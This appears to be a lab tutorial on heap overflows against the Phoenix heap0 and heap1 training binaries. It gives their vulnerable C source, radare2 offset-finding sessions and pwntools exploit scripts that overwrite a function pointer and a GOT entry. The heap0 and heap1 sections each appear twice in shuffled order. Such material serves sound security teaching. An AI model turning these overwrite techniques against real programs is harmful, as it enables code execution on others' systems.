1 of 3

Heap Overflow

Heap Overflow, much like a Stack Overflow, involves too much data being written to the heap. This can result in us overwriting data, most importantly pointers. Overwriting these pointers can cause user input to be copied to different locations if the program blindly trusts data on the heap.

To introduce this (it's easier to understand with an example) I will use two vulnerable binaries from Protostar.

heap0

http://exploit.education/phoenix/heap-zero/

Source

Luckily it gives us the source:

#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

struct data {
  char name[64];
};

struct fp {
  void (*fp)();
  char __pad[64 - sizeof(unsigned long)];
};

void winner() {
  printf("Congratulations, you have passed this level\n");
}

void nowinner() {
  printf(
      "level has not been passed - function pointer has not been "
      "overwritten\n");
}

int main(int argc, char **argv) {
  struct data *d;
  struct fp *f;

  if (argc < 2) {
    printf("Please specify an argument to copy :-)\n");
    exit(1);
  }

  d = malloc(sizeof(struct data));
  f = malloc(sizeof(struct fp));
  f->fp = nowinner;

  strcpy(d->name, argv[1]);

  printf("data is at %p, fp is at %p, will be calling %p\n", d, f, f->fp);
  fflush(stdout);

  f->fp();

  return 0;
}

Analysis

So let's analyse what it does:

Allocates two chunks on the heap
Sets the fp variable of chunk f to the address of nowinner
Copies the first command-line argument to the name variable of the chunk d
Runs whatever the fp variable of f points at

The weakness here is clear - it runs a random address on the heap. Our input is copied there after the value is set and there's no bound checking whatsoever, so we can overrun it easily.

Regular Execution

Let's check out the heap in normal conditions.

$ r2 -d -A heap0 AAAAAAAAAAAA            <== that's just a parameter
$ s main; pdf
[...]
0x0040075d      e8fefdffff     call sym.imp.strcpy         ; char *strcpy(char *dest, const char *src)
0x00400762      488b45f8       mov rax, qword [var_8h]
[...]

We'll break right after the strcpy and see how it looks.

[0x004006f8]> db 0x00400762
[0x004006f8]> dc
hit breakpoint at: 0x400762

If we want, we can check the contents.

So, we can see that the function address is there, after our input in memory. Let's work out the offset.

Working out the Offset

Since we want to work out how many characters we need until the pointer, I'll just use a De Bruijn Sequence.

$ ragg2 -P 200 -r

$ r2 -d -A heap0 AAABAACAADAAE...

Let's break on and after the strcpy. That way we can check the location of the pointer then immediately read it and calculate the offset.

[0x004006f8]> db 0x0040075d
[0x004006f8]> db 0x00400762
[0x004006f8]> dc
hit breakpoint at: 0x40075d

So, the chunk with the pointer is located at 0x2493060. Let's continue until the next breakpoint.

[0x0040075d]> dc
hit breakpoint at: 0x400762

radare2 is nice enough to tell us we corrupted the data. Let's analyse the chunk again.

Notice we overwrote the size field, so the chunk is much bigger. But now we can easily use the first value to work out the offset (we could also, knowing the location, have done pxq @ 0x02493060).

[0x00400762]> wopO 0x6441416341416241
80

So, fairly simple - 80 characters, then the address of winner.

Exploit

from pwn import *

elf = context.binary = ELF('./heap0')

payload = (b'A' * 80 + flat(elf.sym['winner'])).replace(b'\x00', b'')

p = elf.process(argv=[payload])

print(p.clean().decode('latin-1'))

We need to remove the null bytes because argv doesn't allow them

heap1

http://exploit.education/phoenix/heap-one/

Source

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>

struct heapStructure {
  int priority;
  char *name;
};

int main(int argc, char **argv) {
  struct heapStructure *i1, *i2;

  i1 = malloc(sizeof(struct heapStructure));
  i1->priority = 1;
  i1->name = malloc(8);

  i2 = malloc(sizeof(struct heapStructure));
  i2->priority = 2;
  i2->name = malloc(8);

  strcpy(i1->name, argv[1]);
  strcpy(i2->name, argv[2]);

  printf("and that's a wrap folks!\n");
}

void winner() {
  printf(
      "Congratulations, you've completed this level @ %ld seconds past the "
      "Epoch\n",
      time(NULL));
}

Analysis

This program:

Allocates a chunk on the heap for the heapStructure
Allocates another chunk on the heap for the name of that heapStructure
Repeats the process with another heapStructure
Copies the two command-line arguments to the name variables of the heapStructures
Prints something

Regular Execution

Let's break on and after the first strcpy.

$ r2 -d -A heap1 AAAA BBBB

As we expected, we have two pairs of heapStructure and name chunks. We know the strcpy will be copying into wherever name points, so let's read the contents of the first heapStructure. Maybe this will give us a clue.

Look! The name pointer points to the name chunk! You can see the value 0x602030 being stored.

This isn't particularly a revelation in itself - after all, we knew there was a pointer in the chunk. But now we're certain, and we can definitely overwrite this pointer due to the lack of bounds checking. And because we can also control the value being written, this essentially gives us an arbitrary write!

And where better to target than the GOT?

Exploitation

The plan, therefore, becomes:

Pad until the location of the pointer
Overwrite the pointer with the GOT address of a function
Set the second parameter to the address of winner
Next time the function is called, it will call winner

But what function should we overwrite? The only function called after the strcpy is printf, according to the source code. And if we overwrite printf with winner it'll just recursively call itself forever.

Luckily, compilers like gcc compile printf as puts if there are no parameters - we can see this with radare2:

$ r2 -d -A heap1
$ s main; pdf
[...]
0x004006e6      e8f5fdffff     call sym.imp.strcpy         ; char *strcpy(char *dest, const char *src)
0x004006eb      bfa8074000     mov edi, str.and_that_s_a_wrap_folks ; 0x4007a8 ; "and that's a wrap folks!"
0x004006f0      e8fbfdffff     call sym.imp.puts

So we can simply overwrite the GOT address of puts with winner. All we need to find now is the padding until the pointer and then we're good to go.

$ ragg2 -P 200 -r
AABAA...

$ r2 -d -A heap1 AAABAA... 0000

Break on and after the strcpy again and analyse the second chunk's name pointer.

The pointer is originally at 0x8d9050; once the strcpy occurs, the value there is 0x41415041414f4141.

[0x004006cd]> wopO 0x41415041414f4141
40

The offset is 40.

Final Exploit

from pwn import *

elf = context.binary = ELF('./heap1', checksec=False)

param1 = (b'A' * 40 + p64(elf.got['puts'])).replace(b'\x00', b'')
param2 = p64(elf.sym['winner']).replace(b'\x00', b'')

p = elf.process(argv=[param1, param2])

print(p.clean().decode('latin-1'))

Again, null bytes aren't allowed in parameters so you have to remove them.

heap1

http://exploit.education/phoenix/heap-one/

Source

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>

struct heapStructure {
  int priority;
  char *name;
};

int main(int argc, char **argv) {
  struct heapStructure *i1, *i2;

  i1 = malloc(sizeof(struct heapStructure));
  i1->priority = 1;
  i1->name = malloc(8);

  i2 = malloc(sizeof(struct heapStructure));
  i2->priority = 2;
  i2->name = malloc(8);

  strcpy(i1->name, argv[1]);
  strcpy(i2->name, argv[2]);

  printf("and that's a wrap folks!\n");
}

void winner() {
  printf(
      "Congratulations, you've completed this level @ %ld seconds past the "
      "Epoch\n",
      time(NULL));
}

Analysis

This program:

Allocates a chunk on the heap for the heapStructure
Allocates another chunk on the heap for the name of that heapStructure
Repeats the process with another heapStructure
Copies the two command-line arguments to the name variables of the heapStructures
Prints something

Regular Execution

Let's break on and after the first strcpy.

$ r2 -d -A heap1 AAAA BBBB

Look! The name pointer points to the name chunk! You can see the value 0x602030 being stored.

And where better to target than the GOT?

Exploitation

The plan, therefore, becomes:

Pad until the location of the pointer
Overwrite the pointer with the GOT address of a function
Set the second parameter to the address of winner
Next time the function is called, it will call winner

Luckily, compilers like gcc compile printf as puts if there are no parameters - we can see this with radare2:

$ r2 -d -A heap1
$ s main; pdf
[...]
0x004006e6      e8f5fdffff     call sym.imp.strcpy         ; char *strcpy(char *dest, const char *src)
0x004006eb      bfa8074000     mov edi, str.and_that_s_a_wrap_folks ; 0x4007a8 ; "and that's a wrap folks!"
0x004006f0      e8fbfdffff     call sym.imp.puts

So we can simply overwrite the GOT address of puts with winner. All we need to find now is the padding until the pointer and then we're good to go.

$ ragg2 -P 200 -r
AABAA...

$ r2 -d -A heap1 AAABAA... 0000

Break on and after the strcpy again and analyse the second chunk's name pointer.

The pointer is originally at 0x8d9050; once the strcpy occurs, the value there is 0x41415041414f4141.

[0x004006cd]> wopO 0x41415041414f4141
40

The offset is 40.

Final Exploit

from pwn import *

elf = context.binary = ELF('./heap1', checksec=False)

param1 = (b'A' * 40 + p64(elf.got['puts'])).replace(b'\x00', b'')
param2 = p64(elf.sym['winner']).replace(b'\x00', b'')

p = elf.process(argv=[param1, param2])

print(p.clean().decode('latin-1'))

Again, null bytes aren't allowed in parameters so you have to remove them.

heap0

http://exploit.education/phoenix/heap-zero/

Source

Luckily it gives us the source:

#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

struct data {
  char name[64];
};

struct fp {
  void (*fp)();
  char __pad[64 - sizeof(unsigned long)];
};

void winner() {
  printf("Congratulations, you have passed this level\n");
}

void nowinner() {
  printf(
      "level has not been passed - function pointer has not been "
      "overwritten\n");
}

int main(int argc, char **argv) {
  struct data *d;
  struct fp *f;

  if (argc < 2) {
    printf("Please specify an argument to copy :-)\n");
    exit(1);
  }

  d = malloc(sizeof(struct data));
  f = malloc(sizeof(struct fp));
  f->fp = nowinner;

  strcpy(d->name, argv[1]);

  printf("data is at %p, fp is at %p, will be calling %p\n", d, f, f->fp);
  fflush(stdout);

  f->fp();

  return 0;
}

Analysis

So let's analyse what it does:

Allocates two chunks on the heap
Sets the fp variable of chunk f to the address of nowinner
Copies the first command-line argument to the name variable of the chunk d
Runs whatever the fp variable of f points at

The weakness here is clear - it runs a random address on the heap. Our input is copied there after the value is set and there's no bound checking whatsoever, so we can overrun it easily.

Regular Execution

Let's check out the heap in normal conditions.

$ r2 -d -A heap0 AAAAAAAAAAAA            <== that's just a parameter
$ s main; pdf
[...]
0x0040075d      e8fefdffff     call sym.imp.strcpy         ; char *strcpy(char *dest, const char *src)
0x00400762      488b45f8       mov rax, qword [var_8h]
[...]

We'll break right after the strcpy and see how it looks.

[0x004006f8]> db 0x00400762
[0x004006f8]> dc
hit breakpoint at: 0x400762

If we want, we can check the contents.

So, we can see that the function address is there, after our input in memory. Let's work out the offset.

Working out the Offset

Since we want to work out how many characters we need until the pointer, I'll just use a De Bruijn Sequence.

$ ragg2 -P 200 -r

$ r2 -d -A heap0 AAABAACAADAAE...

Let's break on and after the strcpy. That way we can check the location of the pointer then immediately read it and calculate the offset.

[0x004006f8]> db 0x0040075d
[0x004006f8]> db 0x00400762
[0x004006f8]> dc
hit breakpoint at: 0x40075d

So, the chunk with the pointer is located at 0x2493060. Let's continue until the next breakpoint.

[0x0040075d]> dc
hit breakpoint at: 0x400762

radare2 is nice enough to tell us we corrupted the data. Let's analyse the chunk again.

[0x00400762]> wopO 0x6441416341416241
80

So, fairly simple - 80 characters, then the address of winner.

Exploit

from pwn import *

elf = context.binary = ELF('./heap0')

payload = (b'A' * 80 + flat(elf.sym['winner'])).replace(b'\x00', b'')

p = elf.process(argv=[payload])

print(p.clean().decode('latin-1'))

We need to remove the null bytes because argv doesn't allow them